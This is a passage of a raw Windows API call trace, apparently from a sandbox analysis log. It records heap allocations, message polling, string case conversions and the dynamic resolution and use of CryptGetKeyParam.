Flags=0x0, Size=0x10) returned 0x43ca340 [0100.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0100.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0100.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0100.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0100.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0100.326] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0100.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0100.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0100.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0100.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0100.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0100.326] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0100.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0100.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0100.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0100.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0100.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0100.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0100.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0100.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0100.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0100.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0100.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0100.327] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0100.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0100.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0100.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0100.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2690 [0100.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0100.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0100.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0100.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0100.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca418 [0100.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0100.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0100.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0100.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0100.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0100.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0100.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0100.327] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0100.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0100.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0100.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0100.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0100.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0100.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0100.328] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0100.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0100.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0100.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0100.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0100.328] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0100.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0100.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0100.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0100.328] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0100.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0100.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0100.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0100.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0100.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0100.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0100.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0100.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0100.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0100.328] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0100.328] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0100.328] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0100.328] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0100.328] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0100.328] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0100.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0100.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0100.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0100.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0100.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0100.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0100.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0100.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0100.329] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0100.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0100.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0100.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0100.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0100.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0100.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0100.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0100.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0100.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0100.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0100.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0100.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0100.329] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0100.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0100.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0100.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca640 [0100.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0100.329] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0100.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0100.329] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0100.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0100.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0100.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0100.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0100.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0100.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0100.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0100.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0100.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0100.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0100.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0100.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0100.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0100.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0100.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0100.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0100.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0100.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0100.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0100.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0100.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0100.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0100.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0100.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0100.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0100.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0100.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0100.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0100.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0100.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0100.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0100.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0100.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0100.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0100.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0100.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e48 [0100.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0100.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0100.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0100.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0100.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0100.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0100.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0100.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0100.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0100.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0100.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0100.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0100.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0100.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0100.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0100.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0100.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0100.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0100.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0100.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0100.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0100.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0100.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0100.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0100.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0100.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0100.332] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0100.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0100.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0100.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0100.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0100.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0100.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0100.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0100.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0100.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0100.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0100.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0100.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0100.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0100.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0100.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0100.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0100.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0100.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0100.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0100.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0100.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0100.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0100.332] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0100.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0100.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0100.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0100.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0100.333] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0100.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0100.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0100.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0100.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0100.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0100.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0100.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0100.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0100.333] CryptGetKeyParam (in: hKey=0x41ac740, dwParam=0x7, pbData=0x43e28b0, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e28b0*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0100.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0100.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0100.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0100.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0100.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0100.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0100.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0100.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0100.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0100.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0100.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0100.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0100.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0100.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0100.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0100.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0100.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0100.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0100.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0100.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0100.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0100.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0100.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0100.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0100.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0100.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0100.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0100.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0100.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0100.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0100.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0100.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0100.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0100.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0100.334] HeapFree (in: 